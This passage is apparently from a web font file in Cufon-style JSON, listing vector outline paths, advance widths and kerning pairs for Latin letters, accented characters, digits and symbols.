21,18,-56,13,-87,18v-54,9,-86,14,-96,23v-52,172,-97,453,-126,596r-89,440v-52,220,-95,408,-208,559v-71,95,-203,182,-360,135v-15,-5,-36,-15,-57,-37","w":661,"k":{"\u00fc":78,"\u00f6":78,"\u00e5":104,"\u00e4":104,"\u00c5":102,"\u00c4":102,"y":27,"u":78,"o":78,"e":78,"a":104,"A":102,";":-51,":":-76,".":78,",":102}},{"d":"326,65r84,-139v25,-41,52,-81,79,-120v47,-67,143,-217,290,-451r410,-650v16,-6,61,2,59,0r-487,792v-53,68,-100,156,-143,221r-232,349xm423,-632v-150,77,-276,-42,-276,-212v0,-142,108,-346,202,-401v55,-32,108,-52,161,-52v118,0,169,87,167,225v-4,209,-116,369,-254,440xm585,-1153v0,-58,-18,-106,-76,-107v-39,0,-77,23,-117,63v-58,58,-143,295,-144,423v0,81,14,127,76,127v34,0,63,-18,93,-45v59,-53,168,-334,168,-461xm1250,-10v-150,77,-276,-44,-276,-212v0,-143,108,-346,202,-402v55,-33,108,-52,161,-52v118,0,170,87,168,225v-5,208,-117,370,-255,441xm1413,-532v0,-59,-18,-107,-77,-107v-39,0,-76,23,-116,63v-58,58,-144,293,-144,423v0,80,14,127,75,127v35,0,63,-18,93,-45v59,-53,169,-334,169,-461","w":1536},{"d":"399,-99v-6,93,118,59,198,62v218,8,432,9,572,-75v84,-51,114,-98,180,-205v13,0,24,1,33,3v-16,106,-53,178,-78,273v-5,17,-12,33,-19,48v-44,2,-75,3,-93,3r-60,-2r-249,2r-150,-2r-190,2r-293,-7r-246,6v0,-14,1,-23,4,-38v106,-9,227,0,245,-109v26,-156,121,-747,155,-1012v10,-78,-30,-79,-90,-95v-31,-8,-64,-10,-99,-11v1,-12,3,-25,7,-39r316,7r225,-5v0,15,1,26,-2,39v-73,11,-155,2,-181,60v-40,88,-54,271,-73,385r-66,389v-20,91,-41,248,-46,321","w":1301,"k":{"\u00dc":51,"\u00d6":51,"y":51,"Y":205,"W":154,"V":231,"U":51,"T":129,"O":51,"C":27}},{"d":"-86,431v-55,-2,-114,-54,-114,-106v0,-41,24,-80,72,-114v108,-76,286,-92,450,-36v33,-34,106,-103,131,-148v-189,-52,-320,-210,-318,-448v2,-219,71,-321,170,-473v126,-193,282,-305,491,-387v113,-44,293,-56,394,-5v102,51,166,151,205,280v37,120,18,317,-26,428v-76,191,-254,449,-463,540v-126,55,-250,74,-406,75v-9,11,-18,21,-25,30v-33,41,-70,81,-109,120r89,30v202,74,351,160,598,160v130,0,236,-40,318,-120r21,21v-95,117,-244,204,-436,203v-320,-1,-454,-108,-675,-213v-61,58,-179,157,-308,160xm1319,-965v0,-192,-134,-352,-338,-304v-138,33,-176,69,-293,168v-102,87,-122,112,-211,242v-92,135,-185,290,-223,471v-13,63,-10,168,11,212v43,91,130,159,257,159v182,0,274,-77,403,-198v83,-79,153,-166,211,-262v119,-199,183,-288,183,-488xm233,256v-58,-18,-130,-44,-198,-42v-84,2,-193,33,-193,112v0,90,160,81,235,39v78,-43,114,-63,156,-109","w":1408,"k":{"Y":102,"W":27,"V":102,"T":51,"H":-25,"A":51,".":-51,",":-205}},{"d":"1161,-1510v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582","w":1387},{"d":"276,-621r178,-546v-63,36,-126,65,-189,87r-3,-43v126,-51,219,-109,280,-173r60,0r-221,675r-105,0","w":576},{"d":"929,-74v-118,95,-364,100,-590,73v-113,-13,-215,13,-314,16r3,-33v68,-23,177,-1,199,-60v40,-107,38,-183,65,-294v9,-38,17,-114,25,-155r88,-483v2,-46,25,-129,25,-202v0,-62,-116,-61,-176,-62r-17,-7v-1,-13,-1,-18,0,-29v41,-1,63,-2,68,-2r236,4v181,-6,369,-12,450,67v73,71,112,107,112,228v0,65,-27,110,-65,151v-4,6,-79,67,-117,85r-89,43v87,18,150,52,203,101v63,59,85,164,78,284r-21,65v-63,112,-67,132,-163,210xm520,-726v151,-1,196,-17,280,-56v115,-53,223,-266,112,-403v-55,-68,-64,-58,-166,-85v-73,6,-162,-26,-168,67v-12,170,-59,294,-72,464v0,3,5,8,14,13xm389,-109v0,93,40,78,164,83v173,8,291,-79,345,-184v53,-99,61,-139,61,-239v0,-45,-13,-83,-29,-122v-43,-50,-37,-49,-102,-86v-84,-47,-223,-29,-337,-20v-11,42,-14,98,-38,192v-6,25,-10,75,-24,150v-22,118,-40,193,-40,226","w":1152,"k":{"\u00dc":51,"\u00c5":78,"\u00c4":78,"U":51,"A":78,",":27}},{"d":"679,-1394v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm375,-52v34,40,107,32,181,32v241,0,484,2,633,-116v49,-38,89,-94,119,-170v12,0,21,-1,31,2v-7,33,-36,136,-87,311r-627,10r-408,-2v-73,4,-148,-2,-222,1r-1,-31r93,-4v53,-6,80,-10,136,-24v3,-11,6,-26,9,-43v36,-177,58,-304,72,-379r62,-339v2,-8,6,-41,15,-99v16,-102,44,-181,48,-301v-10,-57,-40,-40,-132,-52r-64,-4v1,-12,3,-24,7,-37r354,1r704,-8r82,3v-3,29,-28,183,-47,222v-10,-1,-18,-6,-25,-13v-19,-77,-5,-111,-26,-163v-163,-22,-340,-2,-522,-2v-68,0,-132,-4,-180,24r-87,501v-1,9,-2,19,-3,30v24,-8,591,-35,582,-41v26,-7,46,-17,60,-31v14,-14,40,-61,77,-141r38,-5r-88,431v-12,-1,-24,-2,-35,-2v-1,-28,9,-47,7,-94v-3,-93,-18,-108,-113,-108v-47,0,-102,9,-167,14v-58,4,-193,8,-280,16r-87,8r-113,547v-3,25,-6,35,4,56","w":1408},{"d":"164,-1473r1048,0r0,102r-1048,0r0,-102","w":1024},{"d":"278,-1394v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm187,13r-171,5r0,-34v73,-22,183,-15,202,-72v85,-256,218,-707,218,-1023v0,-44,25,-108,-6,-134v-28,-24,-130,-11,-184,-23v2,-13,5,-28,9,-43r307,12r243,-12r0,35v-28,8,-165,19,-172,33v-9,7,-19,18,-24,35v-40,129,-152,686,-195,902v-31,157,-53,211,-41,252v22,18,140,24,183,33v0,15,12,35,-12,35r-180,3","w":661},{"d":"1358,-1107v-5,-133,-4,-160,-123,-164v-223,-9,-334,32,-490,131v-38,24,-95,71,-170,142v-28,25,-135,161,-185,255v-70,130,-115,397,-17,530v92,125,215,200,429,201v142,0,222,-42,292,-115v11,-12,43,-59,96,-141r33,10r-76,234v-174,66,-502,79,-673,21v-120,-41,-246,-145,-295,-279v-47,-129,-44,-277,3,-389v134,-319,348,-469,666,-599v139,-57,278,-53,455,-54v43,0,88,7,135,20v-5,45,-38,185,-51,224r-29,-1r0,-26","w":1280},{"d":"-12,154r1048,0r0,102r-1048,0r0,-102","w":1024},{"d":"198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106xm1314,-1447v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm1567,-1530v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":1557,"k":{"y":78,"Y":51,"W":51,"V":129,"U":53,"Q":-25,"G":-25}},{"d":"213,-1082v0,-166,141,-307,307,-307v167,0,308,140,308,307v0,165,-142,307,-308,307v-165,0,-307,-142,-307,-307xm743,-1083v0,-120,-103,-223,-223,-223v-120,0,-223,103,-223,223v0,121,102,223,223,223v120,0,223,-103,223,-223","w":811},{"d":"504,-1266v39,-25,114,-4,110,41v-10,118,-67,189,-122,362v-23,72,-90,220,-124,305r-96,242v-10,0,-18,0,-24,-1v42,-251,91,-345,142,-606v31,-160,61,-262,83,-306v9,-18,20,-30,31,-37xm195,23v-60,-2,-87,-40,-93,-111v-4,-51,56,-104,107,-104v45,0,91,53,91,103v0,56,-51,114,-105,112","w":448},{"d":"1713,-1510v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106","w":1557},{"d":"708,-930v-89,0,-166,-75,-166,-164v0,-90,76,-168,166,-168v89,0,165,77,165,166v0,88,-77,166,-165,166xm587,-1096v0,66,55,122,121,122v66,0,122,-56,122,-121v0,-66,-57,-123,-122,-123v-65,0,-121,56,-121,122xm521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462","k":{"v":-25}},{"d":"1058,-585v110,0,177,-77,187,-187r43,0v2,186,-146,319,-334,260v-39,-2,-408,-176,-501,-172v-114,4,-165,72,-187,183r-43,0v3,-186,133,-308,321,-260v91,23,396,176,514,176","w":1365},{"d":"798,-1301r0,1743r-72,0r0,-1743r-187,0r0,1743r-73,0r0,-1043v-231,-11,-346,-45,-430,-181v-63,-102,-68,-280,-7,-379v80,-128,198,-195,407,-195r495,0r0,55r-133,0","w":917},{"d":"198,-55v42,25,139,20,188,37v-1,11,-3,22,-8,34r-185,-13r-277,14v-8,0,-17,-1,-26,-4v-2,-10,-3,-21,-3,-33v64,-20,163,0,212,-39v129,-103,241,-236,359,-349r133,-131r631,-609v41,-47,74,-84,98,-109v7,-7,25,-25,52,-55v22,-3,33,-2,59,0r-33,532r-36,469r-9,245v5,9,20,15,43,18v59,6,103,14,132,25v2,15,1,20,-4,37v-161,-30,-347,-2,-503,3v-10,0,-22,-1,-36,-4r2,-28r200,-32v31,-35,19,-58,35,-178v12,-92,14,-163,15,-212v1,-24,1,-42,2,-53v-8,-1,-27,-1,-58,-1r-578,17v-27,17,-53,51,-86,73v-35,41,-139,127,-191,183r-75,81v-20,18,-41,33,-55,57v1,7,2,16,2,25xm655,-532v168,26,410,-2,587,-13v17,-124,21,-261,31,-393r15,-187v-183,139,-357,332,-530,487v-39,35,-63,63,-103,106xm1257,-1627v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":1557},{"d":"-441,406v2,-52,65,-61,109,-34v15,4,63,65,86,72v93,29,230,-42,282,-84v70,-56,185,-155,226,-272v59,-172,73,-367,58,-608v-6,-97,-7,-138,-43,-180v-20,-15,-48,-7,-63,12v-23,29,-46,83,-69,163v-13,4,-19,0,-33,-9v37,-143,51,-184,104,-252v10,-12,39,-32,71,-32v39,0,70,25,93,75v88,182,35,567,-7,761v127,-186,233,-375,243,-673v2,-71,-20,-160,51,-160v37,0,51,20,51,60v0,153,-156,549,-218,647v-90,142,-182,274,-291,387v-114,118,-264,219,-442,219v-80,0,-135,-10,-164,-30v-29,-20,-44,-41,-44,-62xm329,-1014v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm582,-1097v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":683},{"d":"187,13r-171,5r0,-34v73,-22,183,-15,202,-72v85,-256,218,-707,218,-1023v0,-44,25,-108,-6,-134v-28,-24,-130,-11,-184,-23v2,-13,5,-28,9,-43r307,12r243,-12r0,35v-28,8,-165,19,-172,33v-9,7,-19,18,-24,35v-40,129,-152,686,-195,902v-31,157,-53,211,-41,252v22,18,140,24,183,33v0,15,12,35,-12,35r-180,3xm741,-1722v37,-21,97,-8,96,36v0,29,-27,62,-82,100r-232,164r-18,-1v0,-2,180,-256,180,-252v18,-21,37,-36,56,-47","w":661},{"w":512},{"d":"205,7v-16,27,-91,24,-91,-17v0,-13,3,-29,10,-46v46,-108,166,-467,224,-653v0,-7,-7,-15,-20,-26v-77,62,-59,54,-153,176r-41,2v28,-65,150,-208,211,-241v22,-12,45,-20,72,-22v40,7,50,39,40,82v-31,139,-101,323,-155,441r-4,18v9,-16,28,-52,57,-107v109,-206,189,-331,235,-382v68,-75,225,-71,225,46v0,51,-29,104,-86,102v-55,-2,-53,-23,-59,-87v-16,-34,-36,-30,-63,-9v-54,41,-323,522,-347,598v-19,61,-41,102,-55,125","w":619,"k":{"\u00fc":-25,"\u00f6":-51,"y":-100,"v":-76,"u":-25,"t":-25,"r":-76,"p":-127,"o":-51,"n":-76,"m":-51,"j":-102,"g":-76,"e":-51,"c":-25,";":-127,":":-154,".":27,",":27}},{"d":"621,-640v-41,9,-68,-75,-87,-92r-333,656v69,-3,73,-24,127,-70v37,-31,68,-75,101,-126r47,0v-33,71,-85,140,-156,205v-53,49,-109,75,-169,80r-121,235r-45,0r121,-238v-64,-25,-107,-84,-101,-176v18,-255,207,-485,392,-604v47,-29,92,-46,136,-51r142,-274r44,0r-140,276v60,21,98,49,102,112v2,36,-27,67,-60,67xm157,-90r339,-659v-39,0,-78,23,-123,60v-100,82,-249,365,-253,524v0,29,12,54,37,75","w":619},{"d":"820,-1426r88,0r-705,1703r-87,0","w":1024},{"d":"187,13r-171,5r0,-34v73,-22,183,-15,202,-72v85,-256,218,-707,218,-1023v0,-44,25,-108,-6,-134v-28,-24,-130,-11,-184,-23v2,-13,5,-28,9,-43r307,12r243,-12r0,35v-28,8,-165,19,-172,33v-9,7,-19,18,-24,35v-40,129,-152,686,-195,902v-31,157,-53,211,-41,252v22,18,140,24,183,33v0,15,12,35,-12,35r-180,3xm499,-1447v-44,0,-81,-38,-81,-83v0,-42,38,-80,81,-80v44,0,81,37,81,81v0,44,-38,82,-81,82xm752,-1530v0,-42,38,-79,81,-79v44,0,82,38,82,81v0,44,-38,82,-82,82v-45,0,-81,-38,-81,-84","w":661},{"d":"540,-1314r89,0r0,1819r-89,0r0,-1819","w":1024},{"d":"1290,-143r-1071,-455r0,-79r1071,-453r0,96r-955,396r955,399r0,96","w":1365},{"d":"167,-949r335,0r88,-416r87,0r-88,416r455,0r87,-416r88,0r-88,416r213,0r0,88r-230,0r-85,406r315,0r0,88r-333,0r-85,414r-89,0r87,-414r-458,0r-84,414r-89,0r86,-414r-212,0r0,-88r231,0r85,-406r-316,0r0,-88xm570,-861r-85,404r457,0r85,-404r-457,0","w":1365},{"d":"866,-1076v63,0,84,-54,94,-131r15,0v14,114,-65,201,-163,205v-101,4,-203,-126,-297,-126v-61,0,-85,52,-91,126r-18,0v-6,-117,61,-198,162,-204v92,-5,224,130,298,130xm521,-700v89,-40,157,-55,238,-24v14,-24,22,-56,37,-66v35,-3,49,-6,74,4v8,29,-11,56,-23,88r-66,179v-28,81,-51,145,-73,193v-36,79,-66,197,-101,263v0,4,4,9,11,16v76,-42,159,-133,192,-171v8,7,15,14,22,21v-36,50,-152,172,-213,201v-28,13,-53,21,-77,21v-52,0,-57,-38,-36,-88r62,-152v7,-18,20,-49,41,-94v-70,82,-146,173,-233,249v-30,26,-244,152,-287,35v-50,-134,64,-335,114,-404v89,-124,193,-215,318,-271xm193,-138v0,58,28,86,90,70v59,-16,47,-22,120,-72v144,-149,126,-118,217,-248v19,-27,91,-172,91,-233v0,-34,-24,-70,-72,-68v-87,4,-132,45,-182,89v-112,99,-264,290,-264,462"},{"d":"375,-52v34,40,107,32,181,32v241,0,484,2,633,-116v49,-38,89,-94,119,-170v12,0,21,-1,31,2v-7,33,-36,136,-87,311r-627,10r-408,-2v-73,4,-148,-2,-222,1r-1,-31r93,-4v53,-6,80,-10,136,-24v3,-11,6,-26,9,-43v36,-177,58,-304,72,-379r62,-339v2,-8,6,-41,15,-99v16,-102,44,-181,48,-301v-10,-57,-40,-40,-132,-52r-64,-4v1,-12,3,-24,7,-37r354,1r704,-8r82,3v-3,29,-28,183,-47,222v-10,-1,-18,-6,-25,-13v-19,-77,-5,-111,-26,-163v-163,-22,-340,-2,-522,-2v-68,0,-132,-4,-180,24r-87,501v-1,9,-2,19,-3,30v24,-8,591,-35,582,-41v26,-7,46,-17,60,-31v14,-14,40,-61,77,-141r38,-5r-88,431v-12,-1,-24,-2,-35,-2v-1,-28,9,-47,7,-94v-3,-93,-18,-108,-113,-108v-47,0,-102,9,-167,14v-58,4,-193,8,-280,16r-87,8r-113,547v-3,25,-6,35,4,56","w":1408},{"d":"692,20v-245,4,-515,-184,-504,-439v5,-112,45,-237,105,-316v58,-76,184,-202,343,-197v98,3,168,34,197,120v61,-50,145,-150,203,-215v39,-44,60,-79,70,-102v3,-7,4,-18,4,-33v-53,-5,-73,-30,-75,-73v-3,-55,48,-107,104,-107v42,0,82,39,82,81v0,35,-15,75,-39,120v-24,46,-118,151,-183,223r-279,306v-11,12,-29,33,-54,64v-86,101,-178,203,-277,304v111,89,197,143,402,143v128,0,320,-58,408,-115v131,-86,215,-182,296,-296v38,-53,71,-114,97,-179v-75,-52,-175,-138,-254,-170v-89,-35,-184,17,-179,112v2,44,12,93,61,81v10,-55,12,-79,59,-82v34,-2,51,30,51,63v0,45,-40,78,-89,77v-71,-1,-123,-67,-123,-144v0,-101,109,-203,217,-197v137,7,189,52,299,123v106,69,120,111,223,111v58,0,108,-64,108,-132v0,-61,-39,-119,-93,-105v-12,15,14,42,10,54v0,26,-21,42,-49,42v-32,0,-55,-24,-54,-56v0,-48,43,-84,96,-83v71,2,128,71,128,152v0,108,-107,212,-218,212v-47,0,-98,-12,-153,-37v-118,212,-219,382,-430,526v-147,101,-296,160,-510,164xm702,-853v-8,-49,-108,-38,-150,-18v-79,37,-155,120,-193,188v-19,34,-57,125,-50,229v0,12,2,42,16,88v12,39,28,66,39,85r297,-326v58,-65,92,-104,103,-119v-54,-2,-75,-16,-77,-67v-1,-18,16,-54,15,-60","w":1856},{"d":"1203,-1286v78,0,122,-10,183,-5r1,32v-145,45,-113,0,-233,104r-500,435r-11,12v38,65,87,115,129,175r118,162v52,81,129,196,199,276v39,44,81,47,168,66v-1,16,-4,30,-7,43v-98,1,-173,-18,-275,-16v-61,-86,-103,-156,-136,-202r-61,-85r-112,-162v-37,-62,-86,-118,-131,-174v-28,23,-50,32,-81,55r-82,378v-9,53,-16,81,-11,122v40,40,113,40,177,51v11,7,12,13,10,27v-70,20,-157,4,-230,4v-98,0,-188,8,-289,6r0,-35v44,-14,142,-27,158,-53v36,-32,47,-85,60,-149r73,-350v10,-63,26,-131,50,-242r76,-355v2,-27,12,-47,-2,-71v-45,-32,-148,-17,-193,-42v3,-10,4,-18,4,-25v129,-6,248,16,378,5v53,7,95,-16,144,1v-2,16,-8,30,-19,41v-46,8,-116,-5,-137,27v-28,43,-58,200,-77,274v-31,115,-53,208,-66,279v-4,24,-8,42,-11,55r165,-138v38,-38,83,-69,121,-107v64,-63,112,-104,138,-129v71,-67,165,-143,221,-218v-44,-27,-95,-44,-161,-50r2,-34v83,-22,145,12,250,12","w":1216,"k":{"\u00d6":27,"y":51,"O":27,"C":27}},{"d":"108,-405v11,-13,50,-47,115,-103r372,-318r37,0r-407,417r142,424r-29,1xm481,-402v63,-65,177,-173,340,-325r86,-80r31,1r-339,400r50,402r-26,0","w":789},{"d":"615,177v7,127,98,201,226,230r0,35v-197,-19,-370,-185,-376,-384v-2,-85,48,-241,46,-319v-4,-110,-110,-199,-228,-209r0,-41v121,-11,224,-97,228,-209v3,-77,-48,-235,-46,-319v5,-197,180,-366,376,-383r0,35v-129,28,-219,102,-226,229v-4,79,50,240,45,322v-10,172,-135,291,-295,343v157,53,285,176,295,348v4,82,-49,243,-45,322","w":981},{"d":"219,-1130r1071,455r0,79r-1071,453r0,-96r955,-396r-955,-398r0,-97","w":1365},{"d":"339,-697v0,-53,-46,-45,-74,-4v-31,45,-64,99,-92,166r-41,2v39,-103,91,-187,156,-252v31,-31,62,-47,92,-47v40,1,73,40,71,88v-4,101,-17,130,-58,234r-151,384v-18,56,-31,60,-15,101v7,3,13,5,16,5r65,-31v168,-129,175,-144,293,-301v39,-52,73,-122,75,-207v0,-35,-12,-92,-23,-173v-6,-45,24,-98,62,-102v37,4,65,49,62,101v-10,207,-106,371,-234,520v-75,88,-152,159,-235,207v-55,32,-111,50,-174,26v-46,-40,-26,-84,-2,-146v69,-179,137,-343,192,-498v10,-29,15,-54,15,-73","w":704,"k":{"\u00e5":27,"\u00e4":27,"d":27,"a":27,".":102,",":129}},{"d":"726,-1297v167,0,256,118,253,303v-4,190,-55,303,-133,442v-95,169,-247,313,-413,422v-137,91,-219,119,-346,155v-7,0,-16,-4,-29,-13v3,-42,8,-42,47,-52v186,-50,404,-253,509,-402v91,-128,252,-457,259,-639v3,-91,-45,-163,-121,-163v-51,0,-105,24,-166,66v-100,68,-215,292,-218,445v-1,61,43,120,97,120v42,0,89,-17,118,-38v13,2,14,16,15,31v0,15,-9,28,-28,39v-37,23,-84,35,-141,35v-121,0,-190,-100,-191,-225v0,-139,59,-266,179,-380v102,-98,206,-146,309,-146","w":960},{"d":"370,-620v-50,0,-92,-48,-92,-100v0,-63,45,-117,103,-117v60,0,95,59,95,117v0,45,-56,100,-106,100xm22,465v-46,0,-69,-43,-49,-101r50,-144r129,-340r56,-129r98,-246v11,0,18,0,28,2v-23,142,-80,305,-108,439v-6,33,-23,82,-37,149v-27,127,-39,216,-57,262v-28,72,-31,108,-110,108","w":448},{"d":"113,-1426r87,0r711,1703r-88,0","w":1024},{"d":"667,-1394v11,-13,50,-52,117,-115r270,-255r57,-1r20,373r-21,1r-76,-244r-336,240xm432,-39v-204,-123,-335,-452,-224,-751v27,-72,64,-147,108,-224v15,-26,63,-85,150,-168v44,-42,189,-124,321,-137v220,-21,346,22,479,186v111,137,149,385,78,602v-53,163,-158,294,-272,401v-147,138,-432,216,-640,91xm316,-510v3,216,61,361,204,454v23,8,98,48,166,42v175,-19,222,-61,306,-158v89,-103,160,-277,198,-411v80,-282,4,-592,-202,-676v-195,-79,-391,46,-482,167v-80,107,-192,394,-190,582","w":1387},{"d":"428,-1149v-41,-36,-39,-103,21,-105v79,14,84,43,150,124v68,84,110,148,134,185r-18,0v-172,-116,-266,-185,-287,-204","w":683},{"d":"555,-855v-84,18,-236,74,-343,88r-16,-72v26,-15,179,-39,345,-75r-119,-125v-5,-6,-47,-47,-124,-123v18,-21,36,-40,55,-57v115,141,191,229,228,264r53,-182v18,-60,31,-112,40,-156r74,21v-24,95,-85,229,-107,336v32,-8,56,-19,84,-29v100,-35,122,-37,262,-65v7,23,13,47,18,74r-348,72v53,58,132,127,194,188v19,19,40,38,60,63v-15,15,-34,32,-56,51v-63,-60,-181,-214,-240,-263r-45,159v-25,82,-26,118,-42,183v-27,-6,-52,-15,-73,-26","w":875},{"d":"350,65r84,-139v25,-41,52,-81,79,-120v47,-67,143,-217,290,-451r410,-650v16,-6,61,2,59,0r-487,792v-53,68,-100,156,-143,221r-232,349xm276,-621r178,-546v-63,36,-126,65,-189,87r-3,-43v126,-51,219,-109,280,-173r60,0r-221,675r-105,0xm1352,-674v142,-7,237,107,173,229v-17,33,-55,72,-109,118v-25,22,-133,105,-323,250r328,0r-24,78r-445,0r6,-22v238,-195,377,-316,415,-363v38,-47,57,-92,57,-134v0,-63,-32,-97,-94,-97v-98,0,-121,46,-167,123r-55,0v38,-105,114,-176,238,-182","w":1515},{"d":"753,-989v-33,0,-63,-32,-63,-67v0,-31,30,-57,62,-57v33,0,61,28,61,61v0,34,-27,63,-60,63xm218,-679r1074,0r0,86r-1074,0r0,-86xm753,-291v33,0,62,29,62,62v0,33,-29,62,-62,62v-34,0,-62,-28,-62,-62v0,-34,28,-62,62,-62","w":1365},{"d":"319,-657v0,-54,-40,-74,-73,-34v-13,16,-38,50,-69,107r-26,-11v17,-61,44,-114,79,-159v35,-45,71,-67,106,-67v71,0,93,62,92,157v0,63,-15,140,-44,228v-29,88,-83,209,-161,363v109,-43,239,-156,311,-239v33,-39,127,-192,144,-240v14,-39,19,-77,19,-114v0,-38,-24,-65,-56,-43v-37,25,-64,84,-90,124r-29,-15v37,-87,88,-173,143,-206v91,-55,151,34,144,145v-10,183,-110,439,-198,587v125,-55,243,-141,344,-264v96,-116,127,-213,116,-385v-2,-37,20,-97,54,-97v36,0,60,24,58,62v-11,194,-92,326,-213,466v-127,148,-231,215,-460,311v-59,25,-48,28,-87,11v1,-29,4,-20,21,-44v91,-134,167,-271,208,-406v-134,217,-208,260,-435,405v-56,36,-98,51,-124,51v-22,1,-25,-27,-17,-45v1,-3,14,-27,39,-72v88,-158,141,-289,184,-447v14,-52,20,-96,20,-129","w":1088,"k":{"\u00f6":-25,"\u00e5":27,"\u00e4":27,"o":-25,"h":51,"e":-25,"d":27,"a":27,".":102,",":129}},{"d":"187,13r-171,5r0,-34v73,-22,183,-15,202,-72v85,-256,218,-707,218,-1023v0,-44,25,-108,-6,-134v-28,-24,-130,-11,-184,-23v2,-13,5,-28,9,-43r307,12r243,-12r0,35v-28,8,-165,19,-172,33v-9,7,-19,18,-24,35v-40,129,-152,686,-195,902v-31,157,-53,211,-41,252v22,18,140,24,183,33v0,15,12,35,-12,35r-180,3","w":661},{"d":"1162,0r64,-194r-274,0r6,-47r486,-434r51,0r-141,422r141,0r-17,59r-144,0r-64,194r-108,0xm1246,-253r86,-260r-289,260r203,0xm350,65r84,-139v25,-41,52,-81,79,-120v47,-67,143,-217,290,-451r410,-650v16,-6,61,2,59,0r-487,792v-53,68,-100,156,-143,221r-232,349xm512,-1116v37,-42,53,-126,-22,-125v-47,0,-84,28,-110,83r-44,-18v23,-67,96,-120,184,-120v105,0,174,85,109,160v-17,20,-61,50,-131,89v68,20,108,44,108,113v0,209,-245,338,-498,324r8,-34v125,0,225,-38,300,-113v54,-54,81,-107,81,-158v1,-44,-26,-75,-68,-75v-36,0,-78,19,-125,58v-13,-9,-23,-20,-30,-32v57,-44,205,-114,238,-152","w":1515},{"d":"1262,-470r110,-3r80,3r0,31v-32,10,-114,18,-127,34v-38,46,-52,166,-64,227r-27,132r-215,50v-141,34,-243,45,-397,20v-122,-20,-200,-56,-295,-130v-94,-74,-110,-90,-149,-186v-72,-178,-22,-393,61,-524v124,-195,255,-344,478,-420v221,-76,360,-89,630,-64v45,4,78,9,98,15v5,88,-11,155,-31,227v-12,-1,-24,-4,-37,-8v-13,-61,-10,-158,-46,-188v-18,-15,-124,-21,-133,-22v-157,-3,-293,44,-390,87v-142,63,-276,197,-355,320v-54,84,-162,302,-127,482v43,221,195,368,450,368v152,0,291,-4,325,-124v29,-103,42,-179,42,-228v0,-21,-8,-34,-24,-40v-63,-25,-97,-24,-167,-22v-9,0,-19,-3,-31,-9v16,-35,19,-32,55,-31r79,2r82,-2","w":1451,"k":{".":-76,",":-51}},{"d":"211,-244v63,0,106,88,106,158v0,63,-30,136,-89,218v-59,82,-143,148,-252,197r-12,-33v120,-80,144,-86,200,-175v37,-58,45,-91,-2,-142v-31,-34,-45,-65,-45,-92v-1,-51,37,-131,94,-131","w":448},{"d":"438,-834v0,-207,-27,-283,-78,-487r28,-16v154,338,184,701,71,1070v-101,332,-335,618,-591,78